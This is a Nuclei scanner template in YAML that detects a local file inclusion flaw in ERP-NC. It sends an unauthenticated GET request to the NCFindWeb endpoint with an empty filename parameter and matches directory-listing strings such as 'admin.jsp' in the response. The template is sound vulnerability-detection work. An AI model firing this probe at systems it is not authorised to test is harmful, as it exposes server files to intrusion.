36 lines
769 B
YAML
36 lines
769 B
YAML
id: erp-nc-directory-traversal
|
|
|
|
info:
|
|
name: ERP-NC - Local File Inclusion
|
|
author: pikpikcu
|
|
severity: high
|
|
description: ERP-NC is vulnerable to local file inclusion.
|
|
reference:
|
|
- https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g
|
|
classification:
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
cvss-score: 7.5
|
|
cwe-id: CWE-22
|
|
tags: lfi,erp-nc
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/NCFindWeb?service=IPreAlertConfigService&filename="
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
words:
|
|
- "Client"
|
|
- "ncwslogin.jsp"
|
|
- "admin.jsp"
|
|
part: body
|
|
condition: and
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
# Enhanced by mp on 2022/07/29
|